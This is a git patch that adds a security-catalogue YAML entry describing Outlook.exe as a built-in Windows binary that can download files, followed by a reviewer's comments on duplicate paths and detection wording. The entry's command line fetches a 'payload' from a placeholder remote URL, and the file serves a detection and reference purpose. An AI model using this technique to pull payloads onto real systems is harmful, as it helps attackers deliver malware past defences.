From 0c0e242481037c01ee35504d451b777006338516 Mon Sep 17 00:00:00 2001
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com>
Date: Tue, 8 Nov 2022 21:53:10 +0700
Subject: [PATCH] Add Outlook.exe downloader

---
 yml/OtherMSBinaries/Outlook.yml | 34 +++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 yml/OtherMSBinaries/Outlook.yml

diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml
new file mode 100644
index 0000000..a7efcf3
--- /dev/null
+++ b/yml/OtherMSBinaries/Outlook.yml
@@ -0,0 +1,34 @@
+---
+Name: Outlook.exe
+Description: Microsoft Office component
+Author: Nir Chako
+Created: 2022-11-08
+Commands:
+  - Command: Outlook.exe https://example.com/payload
+    Description: Downloads payload from remote server
+    Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+Detection:
+  - IOC: Suspicious Office application internet/network traffic
+Acknowledgement:
+  - Person: Nir Chako (Pentera)
+    Handle: '@C_h4ck_0'
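Review bot: The last two Full_Path entries are the same string, `C:\Program Files\Microsoft Office\Office12\Outlook.exe`; one of them should be dropped so the list is not duplicated on the rendered page. The single Detection IOC is very broad, while the Usecase line already names where the fetched file lands, so a more specific defender hook can be stated from the entry itself, e.g. `- IOC: Outlook.exe writing a file under %LOCALAPPDATA%\Microsoft\Windows\INetCache shortly after being started with a URL argument`. OperatingSystem lists only Windows 10 and 11 although Office12/Office14 paths are included; if those older installs were not verified on those systems, the paths or the OS list should say so.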